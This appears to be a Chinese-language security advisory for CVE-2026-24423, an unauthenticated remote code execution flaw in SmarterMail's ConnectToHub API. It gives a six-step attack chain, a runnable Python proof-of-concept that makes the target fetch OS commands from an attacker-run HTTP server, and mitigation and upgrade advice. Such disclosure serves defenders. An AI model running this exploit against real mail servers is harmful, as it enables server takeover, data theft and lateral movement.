CVE-2026-24423: SmarterTools SmarterMail ConnectToHub API未授权远程代码执行漏洞

漏洞信息

漏洞编号

CVE-2026-24423

漏洞类型

远程代码执行(RCE)

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

SmarterTools SmarterMail

漏洞概述

CVE-2026-24423是SmarterTools SmarterMail产品中的一个严重安全漏洞，CVSS评分高达9.8分（满分10分）。该漏洞存在于ConnectToHub API方法中，由于缺乏适当的身份验证机制，未经授权的远程攻击者可以利用此漏洞在受影响的服务器上执行任意操作系统命令。攻击者只需要构造恶意的HTTP请求，将SmarterMail服务器指向一个由攻击者控制的恶意HTTP服务器，该服务器会返回包含恶意OS命令的响应。当SmarterMail处理这些响应时，其中的命令将被系统执行，从而实现远程代码执行。漏洞影响版本为build 9511之前的所有SmarterMail版本。由于该漏洞无需认证即可利用，且具有完整的机密性、完整性和可用性影响，因此被评定为严重级别。建议受影响的用户立即升级到build 9511或更高版本以修复此安全问题。

技术细节

该漏洞的根本原因在于SmarterMail的ConnectToHub API方法缺少必要的身份验证检查。ConnectToHub功能原本设计用于SmarterMail服务器之间的通信连接，但实现时未对调用者进行身份验证。攻击者可以通过以下步骤利用此漏洞：首先，攻击者准备一个恶意的HTTP服务器，该服务器能够响应SmarterMail的连接请求，并返回包含任意OS命令的响应内容。然后，攻击者构造针对目标SmarterMail服务器的请求，诱使服务器连接到攻击者控制的恶意HTTP服务器。当SmarterMail服务器与恶意服务器建立连接并接收响应时，响应中的恶意OS命令将以SYSTEM或管理员权限在服务器上执行。由于CVSS向量显示攻击复杂度低（AC:L）且无需认证（PR:N），攻击者无需获取任何有效凭证即可成功利用此漏洞。这种设计缺陷使得任何能够与SmarterMail服务器进行网络通信的远程攻击者都可以执行任意代码。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标环境中运行的SmarterMail版本，确认版本号低于build 9511

STEP 2

步骤2: 搭建恶意HTTP服务器

攻击者在其控制的基础设施上部署一个恶意的HTTP服务器，该服务器将响应包含恶意OS命令的内容

STEP 3

步骤3: 构造恶意请求

攻击者构造针对目标SmarterMail服务器ConnectToHub API的HTTP请求，将serverAddress参数指向攻击者控制的恶意HTTP服务器

STEP 4

步骤4: 触发漏洞利用

目标SmarterMail服务器接收到请求后，会尝试连接到攻击者指定的serverAddress，建立与恶意HTTP服务器的连接

STEP 5

步骤5: 命令执行

恶意HTTP服务器返回包含恶意OS命令的响应内容，SmarterMail服务器在处理响应时执行这些命令，从而实现远程代码执行

STEP 6

步骤6: 持久化控制

攻击者成功执行代码后，可以部署后门、窃取数据或进一步横向移动到网络中的其他系统

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
# CVE-2026-24423 PoC - SmarterMail ConnectToHub Unauthenticated RCE
# Note: This PoC is for educational and authorized testing purposes only

import http.server
import socketserver
import threading
import requests
import sys

class MaliciousHandler(http.server.BaseHTTPRequestHandler):
    def do_GET(self):
        # Send malicious response with OS command
        # Modify 'whoami' to any desired command
        malicious_response = "whoami"
        self.send_response(200)
        self.send_header('Content-type', 'text/plain')
        self.end_headers()
        self.wfile.write(malicious_response.encode())
    
    def log_message(self, format, *args):
        pass  # Suppress logging

def start_malicious_server(port=8080):
    with socketserver.TCPServer(("", port), MaliciousHandler) as httpd:
        httpd.handle_request()  # Handle single request

def exploit_target(target_url, attacker_ip, attacker_port=8080):
    # Start malicious HTTP server in background thread
    server_thread = threading.Thread(target=start_malicious_server, args=(attacker_port,))
    server_thread.daemon = True
    server_thread.start()
    
    # Construct the malicious request to ConnectToHub API
    # The target SmarterMail server will connect back to our server
    endpoint = f"{target_url}/api/v1/connectToHub"
    payload = {
        "serverAddress": f"http://{attacker_ip}:{attacker_port}"
    }
    
    try:
        print(f"[*] Sending exploit to {endpoint}...")
        response = requests.post(endpoint, json=payload, timeout=30)
        print(f"[+] Response status: {response.status_code}")
        print(f"[*] Check attacker server for command execution result")
        return True
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return False

if __name__ == "__main__":
    if len(sys.argv) < 4:
        print(f"Usage: {sys.argv[0]} <target_url> <attacker_ip> <attacker_port>")
        print(f"Example: {sys.argv[0]} http://target:17001 192.168.1.100 8080")
        sys.exit(1)
    
    target = sys.argv[1]
    attacker_ip = sys.argv[2]
    attacker_port = int(sys.argv[3])
    
    exploit_target(target, attacker_ip, attacker_port)

影响范围

SmarterMail < build 9511

防御指南

临时缓解措施

如果无法立即进行版本升级，可以采取以下临时缓解措施：首先，通过网络层防火墙或ACL规则限制对SmarterMail API端点的访问，只允许受信任的IP地址访问；其次，在Web应用层实施请求速率限制和异常检测机制，识别和阻止异常的ConnectToHub API调用；最后，监控SmarterMail服务器的出站网络连接，特别关注连接到未知外部HTTP服务器的行为。但这些措施仅为临时解决方案，不能完全消除漏洞风险，尽快升级到安全版本是最有效的修复方式。